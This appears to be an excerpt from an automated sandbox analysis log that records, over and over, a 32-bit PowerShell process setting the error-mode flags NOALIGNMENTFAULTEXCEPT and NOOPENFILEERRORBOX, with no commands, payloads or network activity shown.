              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
